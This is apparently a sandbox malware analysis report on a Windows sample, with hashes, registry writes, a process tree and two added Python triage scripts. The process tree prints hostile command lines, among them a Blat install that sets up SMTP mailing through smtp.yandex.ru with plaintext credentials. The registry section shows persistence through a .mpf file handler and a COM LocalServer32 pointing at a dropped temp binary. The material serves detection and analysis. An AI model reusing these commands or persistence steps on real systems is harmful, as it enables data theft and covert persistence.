Analysis
max time kernel: 148s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240319-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240319-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08-04-2024 01:25
Behavioral task: behavioral1
Sample: e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe
Resource: win7-20240221-en
(The signatures and process tree reproduced on this page come from the behavioral2 run on the win10v2004-20240319-en image named in the Analysis header; the memory-dump paths in the yara_rule entries are prefixed behavioral2.)
General
Target: e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe
Size: 1.1MB
MD5: e6507f00c8155f6ec0a857d75431801f
SHA1: 794e6b36e2667a2e81800750ab2126df99b89544
SHA256: ab46c89d287660a7cefaa2ab6c9a45b6bc9c3e6acdf56738da9f675e56d3987b
SHA512: 059de3bf4f9e0451ba44f863950c388126c6df105eadfb87e872ee5fb9e96a5cdf9a8a2c83c57e1db7947f38dc09a0001094e801c61c846c07af7126f2d1acab
SSDEEP: 24576:7VvsNq/J8UHrzggc4a0ZkR/u2t1sCSSS1HxyifQcLsHBQz:7V3rzgNRokRm6rdQHxLfQcIi
Malware Config
Signatures
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  Key value queried  \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation  (e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe)
Executes dropped EXE 2 IoCs
Processes:
  PID 3836  blat.exe
  PID 380   mpr.exe
YARA rule match: upx 2 IoCs
Processes:
  behavioral2/memory/3968-0-0x0000000000400000-0x0000000000798000-memory.dmp   upx
  behavioral2/memory/3968-27-0x0000000000400000-0x0000000000798000-memory.dmp  upx
The upx rule matched in both dumps of the main module of PID 3968 (0x400000-0x798000).
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies registry class 21 IoCs
Processes (every entry was written by mpr.exe):
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler"
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe"
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler\ = "Implements DocHostUIHandler"
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\.mpf
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.mpf\ = "mprf"
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe \"%1\""
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "mpr.DocHostUIHandler"
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe,0"
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler\Clsid
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mprf
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\BrowserFlags = "8"
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\EditFlags = "0"
Net effect: the .mpf extension is mapped to the ProgID mprf, whose open verb and DefaultIcon point at the dropped copy of mpr.exe in %TEMP%\7BA8.tmp, and the COM class {3F2BBC05-40DF-11D2-9455-00104BC936FF} (ProgID mpr.DocHostUIHandler) gets a LocalServer32 under the same path. These are machine-wide HKLM\SOFTWARE\Classes writes, which a standard user cannot make; the sandbox ran the sample as Admin. On a real host, check whether the referenced binary still exists before treating the keys as inert: the keys outlive the process that wrote them.
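To see what the writes above actually wire together, the following script replays them and resolves the two lookups Windows performs: extension to ProgID to shell\open\command (what runs when a .mpf file is opened), and ProgID to CLSID to LocalServer32 (what runs when the COM class is instantiated). This is an added example by the editor, not code from the report or the sample; the operation list is transcribed from the entries above, and the "handler in a user-writable temp directory" check is the editor's own triage rule.

```python
"""Replay the registry writes from the "Modifies registry class" section and
resolve the handlers they register.  Added example: the write list is
transcribed from the report, the resolver and the temp-dir rule are the
editor's own."""
import re

# Only operations that set data matter for resolution ("Key created" carries
# none).  Key paths are as reported; \REGISTRY\MACHINE is the kernel name for
# HKLM, and a trailing "\" in the report denotes the key's default value ("").
REGISTRY_OPS = [
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}",
     "", "Implements DocHostUIHandler"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32",
     "", "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler", "", "Implements DocHostUIHandler"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\.mpf", "", "mprf"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command",
     "", "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe \"%1\""),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler\Clsid",
     "", "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID",
     "", "mpr.DocHostUIHandler"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon",
     "", "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe,0"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\mprf", "BrowserFlags", 8),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes\mprf", "EditFlags", 0),
]

CLASSES = r"\REGISTRY\MACHINE\SOFTWARE\Classes"


def build_hive(ops):
    """Fold the write list into {key: {value_name: data}}; registry names are
    case-insensitive, so everything is lower-cased for lookup."""
    hive = {}
    for key, name, data in ops:
        hive.setdefault(key.lower(), {})[name.lower()] = data
    return hive


def read(hive, key, name=""):
    """Read a value (default value when name is ""), None if absent."""
    return hive.get(key.lower(), {}).get(name.lower())


def resolve_open_command(hive, extension):
    """Follow .ext -> ProgID -> shell\\open\\command, as the shell does."""
    progid = read(hive, f"{CLASSES}\\{extension}")
    if progid is None:
        return None
    return read(hive, f"{CLASSES}\\{progid}\\shell\\open\\command")


def resolve_local_server(hive, progid):
    """Follow ProgID -> CLSID -> LocalServer32, checking the 32-bit view
    (WOW6432Node) first because that is where this sample wrote."""
    clsid = read(hive, f"{CLASSES}\\{progid}\\Clsid")
    if clsid is None:
        return None
    for view in ("WOW6432Node\\CLSID", "CLSID"):
        exe = read(hive, f"{CLASSES}\\{view}\\{clsid}\\LocalServer32")
        if exe is not None:
            return exe
    return None


# Editor's triage rule: a persistent handler that lives in a directory any
# standard user can write to is worth a look regardless of what it does.
USER_WRITABLE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)


def handler_findings(hive):
    """Return (what, command, suspicious) for each handler the writes register."""
    findings = []
    cmd = resolve_open_command(hive, ".mpf")
    if cmd:
        findings.append((".mpf open verb", cmd, bool(USER_WRITABLE.match(cmd))))
    exe = resolve_local_server(hive, "mpr.DocHostUIHandler")
    if exe:
        findings.append(("COM LocalServer32", exe, bool(USER_WRITABLE.match(exe))))
    return findings


if __name__ == "__main__":
    for what, cmd, bad in handler_findings(build_hive(REGISTRY_OPS)):
        print(f"{'SUSPICIOUS' if bad else 'ok':10} {what}: {cmd}")
```

Both resolutions land on the same binary in %TEMP%\7BA8.tmp. On a live host the same two lookups can be done against the real hive (HKLM\SOFTWARE\Classes) to confirm whether the association is still active after the temp directory has been cleaned.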
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  PID 664
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
  Token: SeDebugPrivilege  PID 380  mpr.exe
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
  PID 380  mpr.exe
  PID 380  mpr.exe
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
  description                        pid   Process                                              procid_target
  PID 3968 wrote to memory of 876    3968  e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe   94
  PID 3968 wrote to memory of 876    3968  e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe   94
  PID 3968 wrote to memory of 876    3968  e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe   94
  PID 876 wrote to memory of 756     876   cmd.exe                                              97
  PID 876 wrote to memory of 756     876   cmd.exe                                              97
  PID 876 wrote to memory of 756     876   cmd.exe                                              97
  PID 876 wrote to memory of 3836    876   cmd.exe                                              106
  PID 876 wrote to memory of 3836    876   cmd.exe                                              106
  PID 876 wrote to memory of 3836    876   cmd.exe                                              106
  PID 876 wrote to memory of 380     876   cmd.exe                                              107
  PID 876 wrote to memory of 380     876   cmd.exe                                              107
  PID 876 wrote to memory of 380     876   cmd.exe                                              107
Each write targets a process the writer itself spawned (876 is the child of 3968; 756, 3836 and 380 are children of 876, see the process tree), and each pair is logged three times. Nothing here shows a write into a process outside the sample's own tree.
Processes
Summary: the sample drops 1.bat, blat.exe and mpr.exe into %TEMP%\7BA8.tmp and runs the batch through cmd.exe; the batch pauses with ping -n 5, installs a Blat SMTP profile for smtp.yandex.ru:587 with the credentials embedded in the command line, and runs mpr.exe /export, which performs the registry writes listed above. The msedge.exe utility process is a separate root in the tree and is not spawned by the sample.

C:\Users\Admin\AppData\Local\Temp\e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe"
  PID: 3968
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\1.bat" "
      PID: 876
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\PING.EXE
          Command line: ping ya.ru -n 5
          PID: 756
          - Runs ping.exe
        C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\blat.exe
          Command line: blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u donakovi -pw 154632
          (the -f sender address is shown redacted in the source report)
          PID: 3836
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\mpr.exe
          Command line: mpr.exe /export
          PID: 380
          - Executes dropped EXE
          - Modifies registry class
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1304 --field-trial-handle=2232,i,3915538061666887171,15629965885515244134,262144 --variations-seed-version /prefetch:8
  PID: 1152
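The tree above is the kind of thing a triage script should flag without a human reading every command line. The example below, added by the editor and not part of the report or any tool the report mentions, transcribes the process records from the tree (parent PIDs taken from the nesting) and runs four rules over them: an executable launched from a *.tmp directory under %TEMP%, a batch file under %TEMP% run via cmd /c, ping -n used as a delay from a batch script, and a Blat -install with the SMTP password on the command line. The Edge utility process is included as a benign control; its long command line is abbreviated here.

```python
"""Command-line triage over the sandbox process tree.  Added example: the
records are transcribed from the report (ppid from the tree nesting), the
rules are the editor's own and are not part of the report."""
import re

# (pid, ppid, image path, command line).  The Edge record is a benign control
# and its command line is abbreviated; the blat sender address is shown
# redacted in the source report and is kept that way here.
PROCESSES = [
    (3968, None, r"C:\Users\Admin\AppData\Local\Temp\e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe"'),
    (876, 3968, r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\1.bat" "'),
    (756, 876, r"C:\Windows\SysWOW64\PING.EXE", r"ping ya.ru -n 5"),
    (3836, 876, r"C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\blat.exe",
     r"blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u donakovi -pw 154632"),
    (380, 876, r"C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\mpr.exe", r"mpr.exe /export"),
    (1152, None, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --lang=en-US'),
]

# Rule patterns (editor's own).
TEMP_TMPDIR = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.tmp\\", re.I)
BATCH_FROM_TEMP = re.compile(r'\\AppData\\Local\\Temp\\[^"]*\.bat\b', re.I)
PING_DELAY = re.compile(r"^ping(\.exe)?\s+\S+\s+-n\s+(\d+)", re.I)
BLAT_INSTALL = re.compile(
    r"blat(\.exe)?\s+-install\b.*?-server\s+(\S+).*?-port\s+(\d+).*?-u\s+(\S+).*?-pw\s+(\S+)", re.I)


def by_pid(procs):
    return {p[0]: p for p in procs}


def lineage(procs, pid):
    """Image names from the root of the tree down to pid, via the ppid links."""
    index = by_pid(procs)
    chain = []
    while pid is not None:
        _, ppid, image, _ = index[pid]
        chain.append(image.rsplit("\\", 1)[-1].lower())
        pid = ppid
    return chain[::-1]


def triage(procs):
    """Apply every rule to every process; return (pid, rule, detail) tuples."""
    index = by_pid(procs)
    findings = []
    for pid, ppid, image, cmdline in procs:
        parent_cmd = index[ppid][3] if ppid in index else ""
        if TEMP_TMPDIR.search(image):
            findings.append((pid, "exec-from-temp-tmpdir", image))
        if image.lower().endswith("cmd.exe") and BATCH_FROM_TEMP.search(cmdline):
            findings.append((pid, "batch-from-temp", cmdline))
        m = PING_DELAY.match(cmdline)
        if m and ".bat" in parent_cmd.lower():
            # ping -n N against a reachable host is a classic batch-file sleep.
            findings.append((pid, "ping-as-delay", f"{m.group(2)} echo requests from a batch script"))
        m = BLAT_INSTALL.search(cmdline)
        if m:
            # -install persists an SMTP profile; the password is visible to
            # anyone who can read process command lines.
            findings.append((pid, "blat-smtp-profile-with-creds",
                             f"server={m.group(2)}:{m.group(3)} user={m.group(4)} password-on-cmdline=yes"))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in triage(PROCESSES):
        print(f"{pid:5} {rule:30} {' > '.join(lineage(PROCESSES, pid))}")
        print(f"      {detail}")
```

The rules fire on the batch, the ping, and both dropped executables, and stay silent on the sample's own root process and on Edge; the lineage string is what gives an analyst the context (sample > cmd.exe > blat.exe) without rereading the tree.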
Network
MITRE ATT&CK Enterprise v15
Downloads
(file names are not recorded on this page; entries are listed by size and hash)

Filesize: 340B
MD5: b484fff9108e34bc60c06be2188ce7f8
SHA1: 4472a8ea5902d5c770e163d8fb3bc781750c11f0
SHA256: f9dcaf616357d5f5db051803eedcbfe99bb1e09573e702becaa104cb2207927b
SHA512: 5efffd0c08a41eb785250463078cbcb575afebd3333a846671f94034042e376ecb9f5d1f7b24052c69345ee3bd79490cb70e0eb3725df72cdcb855c9b1ff1f14

Filesize: 112KB
MD5: 31f84e433e8d1865e322998a41e6d90e
SHA1: cbea6cda10db869636f57b1cffad39b22e6f7f17
SHA256: aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e
SHA512: 7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

Filesize: 3.3MB
MD5: 8dba37604bf06ebcef07dd1085865a6a
SHA1: 1202eb0ea461c502daa7da9d7d75fff226bf57bd
SHA256: 038ab25642a1220c27028d0b559062b43764c66541ec07a96b2a99d25d9638b0
SHA512: 0f286677e964d733ea3270f0f196769d8ddddb4a6bb3007187eae56e9abb5e22ee984703df5356b5d9049e5ad3b24c567ae13773684113a4440b2cce5d0132fa

Filesize: 257B
MD5: 7747daf77047bd41bfe8fe23170c9e70
SHA1: 916568058d3cd57f4263821c824b72f0aef9b7a6
SHA256: b1e4df621dcf3ac9bdcfa4b18ca8f2132e71ac2586bb3df0c52f9993aedd0ee8
SHA512: 3cd79356260684671a2d51703282bdca3c50b47768c62dd1cf9763f01b74b83cd34380bafd715df0ef05dae06b484041e92f8af99ed50a8eb6361620ea349f5c